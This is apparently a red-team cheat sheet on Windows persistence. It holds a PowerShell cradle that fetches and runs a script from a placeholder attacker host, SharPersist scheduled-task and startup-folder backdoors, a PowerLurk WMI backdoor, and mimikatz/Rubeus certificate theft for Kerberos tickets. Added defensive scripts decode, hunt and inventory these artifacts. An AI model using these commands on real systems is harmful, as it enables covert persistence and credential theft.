# Windows

## Encoding commands

The commands you want to execute usually contain special characters (quotes, parentheses, pipes), so the safest approach is to encode them in the form PowerShell's `-EncodedCommand` expects, which avoids quoting and escaping errors when they are run.

* **Windows**

```powershell
$str = 'IEX ((new-object net.webclient).downloadstring("http://<ATTACKER_IP>/shell.ps1"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
```

* **Linux**

```bash
str='IEX ((new-object net.webclient).downloadstring("http://<ATTACKER_IP>/shell.ps1"))'
# printf (not echo -e) so backslashes in the command are not interpreted; quote $str to keep spacing intact
printf '%s' "$str" | iconv -f UTF-8 -t UTF-16LE | base64 -w 0
```

## Task Scheduler

A task that will be executed hourly.

```powershell
.\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <ENCODED_PAYLOAD>" -n "Updater" -m add -o hourly
```
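The two sections above (encoding a command and registering an hourly task) are also what a defender needs to reverse: decode the `-enc` argument found in a task's action or a process command line, and walk the registered tasks for that signature. The block below is an added example, not code from the original guide or from SharPersist; the function names `ConvertFrom-EncodedCommandLine` and `Find-EncodedPowerShellTask` are my own, and the sample command line is constructed inline so the decoder can be run without a suspicious task being present.

```powershell
# Added example, not part of the original guide: decode a PowerShell -EncodedCommand
# argument and hunt scheduled tasks that launch one. The encoding is Base64 over the
# UTF-16LE bytes of the script, which is why a plain Base64 decoder shows NUL bytes.

function ConvertFrom-EncodedCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)

    # powershell.exe accepts -ec and any unambiguous prefix of -EncodedCommand
    # (-e, -en, -enc, ...), so test the switch as a prefix rather than a fixed string.
    $tokens = @($CommandLine -split '\s+' | Where-Object { $_ })
    for ($i = 0; $i -lt $tokens.Count - 1; $i++) {
        if ($tokens[$i] -match '^[-/](e[a-z]*)$') {
            $switch = $Matches[1].ToLower()
            if ($switch -eq 'ec' -or 'encodedcommand'.StartsWith($switch)) {
                $b64 = $tokens[$i + 1].Trim('"', "'")
                try   { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b64)) }
                catch { return $null }   # switch present but the argument is not valid Base64
            }
        }
    }
    return $null
}

function Find-EncodedPowerShellTask {
    # Walks every registered task. The -nop -w hidden -enc triple used in the guide is
    # the pattern worth reviewing, whatever innocuous name the task was given.
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM handler actions have no Execute
            $line = "$($action.Execute) $($action.Arguments)"
            if ($line -notmatch 'powershell|pwsh') { continue }
            $decoded = ConvertFrom-EncodedCommandLine -CommandLine $line
            if ($null -eq $decoded) { continue }
            [pscustomobject]@{
                TaskPath = $task.TaskPath
                TaskName = $task.TaskName
                Author   = $task.Author
                Triggers = ($task.Triggers | ForEach-Object { $_.CimClass.CimClassName }) -join ','
                Decoded  = $decoded
            }
        }
    }
}

# Constructed sample: a benign script encoded the same way the guide shows.
$sample = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Write-Output "triage me"'))
ConvertFrom-EncodedCommandLine -CommandLine "powershell.exe -nop -w hidden -enc $sample"

# Live hunt on the current host (needs the ScheduledTasks module, Windows 8 / Server 2012 and later).
Find-EncodedPowerShellTask | Format-List
```

The same decoder applies to the `CommandLine` field of Sysmon event 1 or Security event 4688, and a task created this way is also recorded as Security event 4698 (scheduled task created) when object-access auditing for that subcategory is enabled, so the decoded text can be matched against the task XML in that event.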

## StartUp Folder

This command will be executed once the user logs in.

```powershell
SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <ENCODED_PAYLOAD>" -f "UserEnvSetup" -m add
```

## WMI

Create a permanent WMI event subscription whose consumer runs whenever a process is started. In this case, the trigger is `notepad.exe` being launched.

```powershell
Import-Module .\PowerLurk.ps1
Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe
```
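Both the StartUp folder and WMI sections above land an artifact that an administrator can enumerate and baseline: a file or shortcut in one of the two startup folders, and a filter, consumer and binding in the `root/subscription` namespace. The block below is an added example and is not part of the original guide, PowerLurk or SharPersist; the function names `Get-StartupFolderEntry` and `Get-WmiPermanentSubscription` are my own.

```powershell
# Added example, not part of the original guide: enumerate the two autostart locations
# covered above so they can be baselined and diffed over time.

function Get-StartupFolderEntry {
    # Per-user folder of the current user plus the all-users folder (writing to the
    # latter needs admin rights, which is why user-level persistence uses the former).
    $folders = @(
        [Environment]::GetFolderPath('Startup'),
        [Environment]::GetFolderPath('CommonStartup')
    )
    $shell = New-Object -ComObject WScript.Shell   # used to resolve .lnk targets
    foreach ($folder in $folders) {
        Get-ChildItem -LiteralPath $folder -File -Force -ErrorAction SilentlyContinue |
            Where-Object { $_.Name -ne 'desktop.ini' } |
            ForEach-Object {
                $target = $null
                if ($_.Extension -eq '.lnk') {
                    $lnk    = $shell.CreateShortcut($_.FullName)
                    $target = "$($lnk.TargetPath) $($lnk.Arguments)".Trim()
                }
                [pscustomobject]@{
                    Folder  = $folder
                    Name    = $_.Name
                    Created = $_.CreationTime
                    Target  = $target
                }
            }
    }
}

function Get-WmiPermanentSubscription {
    # A permanent subscription is three objects: a filter (the WQL trigger), a consumer
    # (what runs) and a binding tying them together. Walk the bindings: a filter or
    # consumer without a binding does nothing.
    $ns        = 'root/subscription'
    $filters   = @(Get-CimInstance -Namespace $ns -ClassName __EventFilter)
    $consumers = @(Get-CimInstance -Namespace $ns -ClassName __EventConsumer)  # all consumer subclasses
    foreach ($binding in Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding) {
        $filter   = $filters   | Where-Object { $_.Name -eq $binding.Filter.Name }   | Select-Object -First 1
        $consumer = $consumers | Where-Object { $_.Name -eq $binding.Consumer.Name } | Select-Object -First 1
        # CommandLineEventConsumer carries a command line, ActiveScriptEventConsumer a script body
        $payload = if ($consumer.CommandLineTemplate) { $consumer.CommandLineTemplate }
                   elseif ($consumer.ScriptText)      { $consumer.ScriptText }
                   else                               { $null }
        [pscustomobject]@{
            Filter       = $filter.Name
            Query        = $filter.Query
            ConsumerType = $consumer.CimClass.CimClassName
            Consumer     = $consumer.Name
            Payload      = $payload
        }
    }
}

Get-StartupFolderEntry | Format-Table -AutoSize
Get-WmiPermanentSubscription | Format-List   # run elevated to see the whole namespace
```

A default Windows install has one binding, the `SCM Event Log` filter and consumer pair; any other entry, and in particular a `CommandLineEventConsumer` whose filter selects `__InstanceCreationEvent` on `Win32_Process`, is what the PowerLurk command above creates and merits review. Sysmon events 19, 20 and 21 record the creation of the filter, consumer and binding respectively if that logging is in place.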

## Certificates

Certificates are a valuable tool for maintaining persistent access to both users and computers, as they typically have a longer lifespan compared to passwords. User certificates, for instance, are valid for a full year by default, regardless of any password changes made during that period. Unlike password-based access, certificates only become invalid if they are revoked by the issuing Certificate Authority (CA) or if they expire.

Additionally, certificate-based access does not rely on any vulnerable templates, making it a reliable option for maintaining access. Attackers can extract already issued certificates or request new ones to continue accessing the target system(s) over an extended period of time.

### User

1\. Enumerate the certificates on the machine

```powershell
.\Seatbelt.exe Certificates
```

2\. Dump the certificates with mimikatz. The exported `.pfx` files are protected with the password `mimikatz`.

```powershell
.\mimikatz.exe "crypto::certificates /export" "exit"
```

3\. Base64 encode the pfx file.

```bash
cat <CERTIFICATE>.pfx | base64 -w 0
```

4\. Use Rubeus to obtain a TGT.

```powershell
.\Rubeus.exe asktgt /password:mimikatz /nowrap /user:nlamb [/enctype:aes256] /certificate:<BASE64_CERT>
```

### Computer

> You must be admin.

1\. Extract the machine certificates.

```powershell
.\mimikatz.exe "crypto::capi" "crypto::certificates /systemstore:local_machine /export" "exit"
```

2\. Base64 encode the pfx file.

```bash
cat <CERTIFICATE>.pfx | base64 -w 0
```

3\. Request a TGT

```powershell
.\Rubeus.exe asktgt /user:<HOSTNAME>$ /enctype:aes256 /password:mimikatz /nowrap /certificate:<BASE64_CERT>
```
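The Certificates section explains why an issued certificate outlives a password reset and is only cut off by expiry or revocation at the CA. The defender's counterpart to the Seatbelt and mimikatz steps is an inventory of the certificates in the user and machine stores that carry a logon-capable EKU, with the serial number needed to revoke them. The block below is an added example, not code from the original guide, Seatbelt or Rubeus; the function name `Get-LogonCapableCertificate` is my own, and the EKU list is the standard set of OIDs accepted for Kerberos PKINIT.

```powershell
# Added example, not part of the original guide: list certificates in the personal stores
# that could authenticate a principal (the Rubeus asktgt step above), with the fields a
# defender needs to decide whether to let them expire or revoke them at the CA.

function Get-LogonCapableCertificate {
    param([string[]]$StorePath = @('Cert:\CurrentUser\My', 'Cert:\LocalMachine\My'))

    # EKUs that allow certificate logon. A certificate with no EKU at all is accepted by
    # some configurations too, so it is reported with an empty EKU list rather than skipped.
    $logonEku = @('1.3.6.1.5.5.7.3.2',        # Client Authentication
                  '1.3.6.1.4.1.311.20.2.2',   # Smart Card Logon
                  '1.3.6.1.5.2.3.4')          # PKINIT Client Authentication
    foreach ($path in $StorePath) {
        Get-ChildItem -Path $path -ErrorAction SilentlyContinue | ForEach-Object {
            $oids   = @($_.EnhancedKeyUsageList | ForEach-Object { $_.ObjectId })
            $usable = ($oids.Count -eq 0) -or ($oids | Where-Object { $logonEku -contains $_ })
            if (-not $usable) { return }   # inside ForEach-Object, return skips this certificate

            # Template information is carried in a Microsoft-specific extension (v2 or v1 form)
            $tmplExt  = $_.Extensions |
                        Where-Object { $_.Oid.Value -in '1.3.6.1.4.1.311.21.7', '1.3.6.1.4.1.311.20.2' } |
                        Select-Object -First 1
            $template = if ($tmplExt) { $tmplExt.Format($false) } else { $null }

            [pscustomobject]@{
                Store         = $path
                Subject       = $_.Subject
                Issuer        = $_.Issuer
                Template      = $template
                EKU           = $oids -join ','
                HasPrivateKey = $_.HasPrivateKey
                NotAfter      = $_.NotAfter
                DaysLeft      = [int]($_.NotAfter - (Get-Date)).TotalDays
                SerialNumber  = $_.SerialNumber   # what certutil -revoke takes on the CA
                Thumbprint    = $_.Thumbprint
            }
        }
    }
}

Get-LogonCapableCertificate | Sort-Object NotAfter | Format-Table Store, Subject, Template, DaysLeft, HasPrivateKey, SerialNumber -AutoSize
```

Run it elevated to include `Cert:\LocalMachine\My`. When a certificate has to be cut off before expiry, `certutil -revoke <SerialNumber> 1` on the issuing CA (reason 1 = KeyCompromise) is the mitigation the section itself refers to; the KDC keeps accepting the certificate until it fetches a fresh CRL, so publish one after revoking rather than waiting for the scheduled interval.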
